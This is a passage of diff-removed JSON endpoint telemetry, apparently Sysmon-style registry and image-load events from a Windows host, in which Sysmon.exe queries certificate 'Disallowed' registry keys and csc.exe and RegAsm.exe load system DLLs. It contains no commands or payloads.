"registry_value": "CRLs", - "timestamp": 131883570861840000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": 
"{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "file", - "file_name": "CSC.EXE-F7BE4369.pf", - "file_path": "C:\\Windows\\Prefetch\\CSC.EXE-F7BE4369.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", 